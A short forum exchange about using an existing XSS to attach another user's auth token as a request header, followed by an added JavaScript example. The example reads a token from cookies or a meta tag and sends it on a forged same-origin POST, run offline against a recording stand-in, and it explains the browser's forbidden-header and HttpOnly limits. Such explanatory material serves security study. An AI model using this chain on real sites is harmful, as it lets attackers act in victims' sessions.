AFAIK it can't be exploited, because how could you forge a header for another user (unless you could perform HTTP request smuggling or CRLF injection)? You would also require XSS or CRLF for cookie manipulation.
Right. I do have an XSS on that domain, but how do I add a header for the other user, though? CRLF?
Can you access that token value from your XSS? If yes, then you can add the header using XHR setRequestHeader(). Reference: https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/setRequestHeader
Thanks man. :)
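Added example, not code from anyone in the thread above: it shows the step the last reply describes. A script running under XSS on the target origin reads a token the page exposes (a non-HttpOnly cookie or a meta tag), then sends it as a custom header on a same-origin XMLHttpRequest. The browser attaches the victim's own cookies to that request, so the attacker does not need to forge the victim's cookie, only to run script on the victim's origin. The header name `X-Auth-Token`, the path `/api/profile`, the cookie name `auth_token` and the `RecordingXHR` stand-in are hypothetical, introduced so the chain runs offline; in a browser you would pass `() => new XMLHttpRequest()` instead.

```javascript
// Added example (not from the thread). Demonstrates reading a token that XSS
// can reach and attaching it as a custom header on a same-origin XHR.
// All names below (X-Auth-Token, /api/profile, auth_token) are hypothetical.

// Read a named cookie from document.cookie. Only cookies set without
// HttpOnly are visible to script; an HttpOnly token cannot be read this way.
function readCookie(cookieString, name) {
  for (const part of cookieString.split(';')) {
    const [k, ...rest] = part.trim().split('=');
    if (k === name) return decodeURIComponent(rest.join('='));
  }
  return null;
}

// Read a token embedded in the page as <meta name="..." content="...">,
// a common place for CSRF/API tokens that XSS can reach via document.head.
function readMetaToken(html, metaName) {
  const re = new RegExp(
    '<meta[^>]*name=["\']' + metaName + '["\'][^>]*content=["\']([^"\']*)["\']', 'i');
  const m = html.match(re);
  return m ? m[1] : null;
}

// Send the request carrying the stolen token. xhrFactory returns an
// XMLHttpRequest-like object so the same code runs in a browser
// (() => new XMLHttpRequest()) and offline with the recorder below.
function forgeHeaderRequest(xhrFactory, url, headerName, token) {
  const xhr = xhrFactory();
  xhr.open('POST', url, true);
  xhr.setRequestHeader(headerName, token);
  xhr.setRequestHeader('Content-Type', 'application/json');
  // Browsers silently drop forbidden request headers such as Cookie or Host;
  // the victim's cookies are attached by the browser itself, not by script.
  xhr.setRequestHeader('Cookie', 'session=forged');
  xhr.send(JSON.stringify({ action: 'update' }));
  return xhr;
}

// Offline stand-in for XMLHttpRequest (constructed for this example). It
// records what a real XHR would send and mimics the forbidden-header rule
// for a subset of the forbidden request header names.
const FORBIDDEN = new Set(['cookie', 'cookie2', 'host', 'origin', 'referer',
  'content-length', 'connection', 'transfer-encoding']);

class RecordingXHR {
  constructor() { this.opened = false; this.headers = {}; this.ignored = []; }
  open(method, url) { this.method = method; this.url = url; this.opened = true; }
  setRequestHeader(name, value) {
    if (!this.opened) throw new Error('InvalidStateError: call open() first');
    if (FORBIDDEN.has(name.toLowerCase())) { this.ignored.push(name); return; }
    this.headers[name] = value;
  }
  send(body) { this.body = body; }
}

// Constructed sample of what the XSS payload would see on the victim's page.
const SAMPLE_COOKIES = 'theme=dark; auth_token=abc123; lang=en';
const SAMPLE_HTML = '<html><head><meta name="csrf-token" content="tok-42"></head></html>';

// Run the whole chain offline and return the recorded request.
function demo() {
  const token = readCookie(SAMPLE_COOKIES, 'auth_token') ||
                readMetaToken(SAMPLE_HTML, 'csrf-token');
  return forgeHeaderRequest(() => new RecordingXHR(), '/api/profile',
                            'X-Auth-Token', token);
}

const req = demo();
console.log(req.method, req.url, req.headers, 'ignored:', req.ignored);
```

The recorder makes the two practical limits visible: `setRequestHeader` must follow `open()`, and forbidden header names (Cookie, Host, Origin, Referer and friends) are dropped by the browser, so the XSS can add arbitrary custom headers but cannot rewrite the cookie or origin headers the server sees. If the token is only in an HttpOnly cookie, `readCookie` returns null and this route fails; that is the check to make before relying on the XSS.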